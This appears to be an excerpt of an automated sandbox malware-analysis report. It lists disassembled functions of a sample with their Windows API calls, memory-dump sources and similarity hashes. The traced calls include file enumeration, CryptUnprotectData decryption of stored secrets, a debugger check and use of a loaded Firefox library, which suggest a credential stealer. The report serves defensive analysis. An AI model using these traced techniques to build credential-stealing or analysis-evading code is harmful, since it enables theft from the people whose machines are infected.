Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

\*.*, xrefs: 0040D556
[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: a10415128f82763c69118b784d5d9ef3f316688badd4acd86b2481b435ac45e2
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: a10415128f82763c69118b784d5d9ef3f316688badd4acd86b2481b435ac45e2
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BBB52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB53F7

Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BBB56C3
__Init_thread_footer.LIBCMT ref: 6BBB56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BBB56BE

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: cdbb1a5b6b02c140cbc2179cd59feef36a303ad0fc2c82918e3d1d5f53102c2a
Instruction ID: 4e08f8d0e1108a5ea717430d88f4fd9b2ffdf896d95aa72c438a98fdb339e8f5
Opcode Fuzzy Hash: cdbb1a5b6b02c140cbc2179cd59feef36a303ad0fc2c82918e3d1d5f53102c2a
Instruction Fuzzy Hash: C5E17F71814F858AC712DF34C86026BB7B6BF9B390F109B4EE8AF2B550DF75E4468612

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BB89B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BBDB92D), ref: 6BB89BC8
Part of subcall function 6BB89B80: __Init_thread_footer.LIBCMT ref: 6BB89BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BB803D4,?), ref: 6BBDB955
NtQueryVirtualMemory.NTDLL ref: 6BBDB9A5
NtQueryVirtualMemory.NTDLL ref: 6BBDBA20
RtlNtStatusToDosError.NTDLL ref: 6BBDBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BBDBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BBDBA86

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: d5e276f3bc2f0f3f9fa0bbc462ea0f316264a37fd27e5c2845a4cc74d73e9d7f
Instruction ID: 2c2ae642868e371d643a84973ea31d089baa58f537fbbee88465c3e201d101f4
Opcode Fuzzy Hash: d5e276f3bc2f0f3f9fa0bbc462ea0f316264a37fd27e5c2845a4cc74d73e9d7f
Instruction Fuzzy Hash: 1E517F75E01259DFDF28CFA8D881ADDBBB6EF88354F104129E905B7204DB38AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBAFA80: GetCurrentThreadId.KERNEL32 ref: 6BBAFA8D
Part of subcall function 6BBAFA80: AcquireSRWLockExclusive.KERNEL32(6BBFF448), ref: 6BBAFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8CBA
free.MOZGLUE(?), ref: 6BBB8CCF

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: 88d79d09fd381faf6bfabe5404d0d903c5d1d658c93a8e0f885a1b1cbad5b218
Instruction ID: 1e5e8d5b61ec57be252e1340b6f4b3f7ab14ddee3c9d890732183f0d14fe89a5
Opcode Fuzzy Hash: 88d79d09fd381faf6bfabe5404d0d903c5d1d658c93a8e0f885a1b1cbad5b218
Instruction Fuzzy Hash: 3D718F75A14B41CFD704CF29C88062AB7F1FF99314F459A9DE9899B362EB74E880CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6BB7F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6BB7F2F0
NtQueryVirtualMemory.NTDLL ref: 6BB7F308
RtlNtStatusToDosError.NTDLL ref: 6BB7F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BB7F371

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: ea730f2ed7627d1ea5bb8c67a145828d9ace0c4cd7123eb1b5e5cccf6fd86718
Instruction ID: a177a81e30b4fdf7de56a0d6365f0adebc86421e0c433c93c3518d2e939a5eb2
Opcode Fuzzy Hash: ea730f2ed7627d1ea5bb8c67a145828d9ace0c4cd7123eb1b5e5cccf6fd86718
Instruction Fuzzy Hash: 9F217170A003C8EBEF30AA65DD95BEE77B8EB45358F014239E53096190D7BC9988C775

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE53C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6BBE86AE

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: 0c0dfd281dddc1f6fe86e82705df4bfd1ec5bdd8cfddba9b067225d6b1c95de1
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: C6C1C772E0015A8FDB24CF68CC917EDB7B2EF85314F1502A9C549EB355D734A98ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6BBE8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6BBE925C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 212922bab14ed61db5d2e5a0058fb440d1f1e85d258e10bee8b997875c0b6981
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 1AA1D672E001568FDB24CE68CC817DDB7B2EF85314F1502B9C949EB395D734A99ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BB803D4,?), ref: 6BBDB955
NtQueryVirtualMemory.NTDLL ref: 6BBDB9A5

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: dc34dcb3abaf2b9974c0abd6a61a717082ed3a25c821a40d29c322c563819988
Instruction ID: 73cc496bfc503a69e4a28af7330d42872cc8534897522a92869946cc2aedcf58
Opcode Fuzzy Hash: dc34dcb3abaf2b9974c0abd6a61a717082ed3a25c821a40d29c322c563819988
Instruction Fuzzy Hash: CF41D571E0025D9FDF18CFA8D891AEEB7B6EF88354F10812AE505A7344DB39AC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6BB819A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BBFF760), ref: 6BB819BD
GetCurrentProcess.KERNEL32 ref: 6BB819E5
GetLastError.KERNEL32 ref: 6BB81A27
moz_xmalloc.MOZGLUE(?), ref: 6BB81A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BB81A4F
GetLastError.KERNEL32 ref: 6BB81A92
moz_xmalloc.MOZGLUE(?), ref: 6BB81AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BB81ABA
LocalFree.KERNEL32(?), ref: 6BB81C69
free.MOZGLUE(?), ref: 6BB81C8F
free.MOZGLUE(?), ref: 6BB81C9D
CloseHandle.KERNEL32(?), ref: 6BB81CAE
ReleaseSRWLockExclusive.KERNEL32(6BBFF760), ref: 6BB81D52
GetLastError.KERNEL32 ref: 6BB81DA5
GetLastError.KERNEL32 ref: 6BB81DFB
GetLastError.KERNEL32 ref: 6BB81E49
GetLastError.KERNEL32 ref: 6BB81E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BB81E9B

Part of subcall function 6BB82070: LoadLibraryW.KERNEL32(combase.dll,6BB81C5F), ref: 6BB820AE
Part of subcall function 6BB82070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BB820CD
Part of subcall function 6BB82070: __Init_thread_footer.LIBCMT ref: 6BB820E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB81F15
VerSetConditionMask.NTDLL ref: 6BB81F46
VerSetConditionMask.NTDLL ref: 6BB81F52
VerSetConditionMask.NTDLL ref: 6BB81F59
VerSetConditionMask.NTDLL ref: 6BB81F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB81F6D

Strings

D, xrefs: 6BB81B57

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 41479cef8a5c9aecd6e09b4489b3923e20feaa3a9f4869287a7cb2bf691645dc
Instruction ID: 73c61e8ba5a8dc1476e9405ea3ca2cedb9e625e59725b195d49d801d7aee7c3e
Opcode Fuzzy Hash: 41479cef8a5c9aecd6e09b4489b3923e20feaa3a9f4869287a7cb2bf691645dc
Instruction Fuzzy Hash: 64F19F71D01365AFEB209F65DC88BAAB7B9FF49700F044199E915A7240E779ED80CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BB9BB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6BB9BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6BB9BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BB9BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB9BE33
VerSetConditionMask.NTDLL ref: 6BB9BE65
VerSetConditionMask.NTDLL ref: 6BB9BE71
VerSetConditionMask.NTDLL ref: 6BB9BE7D
VerSetConditionMask.NTDLL ref: 6BB9BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB9BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB9BEE4
VerSetConditionMask.NTDLL ref: 6BB9BF15
VerSetConditionMask.NTDLL ref: 6BB9BF21
VerSetConditionMask.NTDLL ref: 6BB9BF2D
VerSetConditionMask.NTDLL ref: 6BB9BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB9BF47

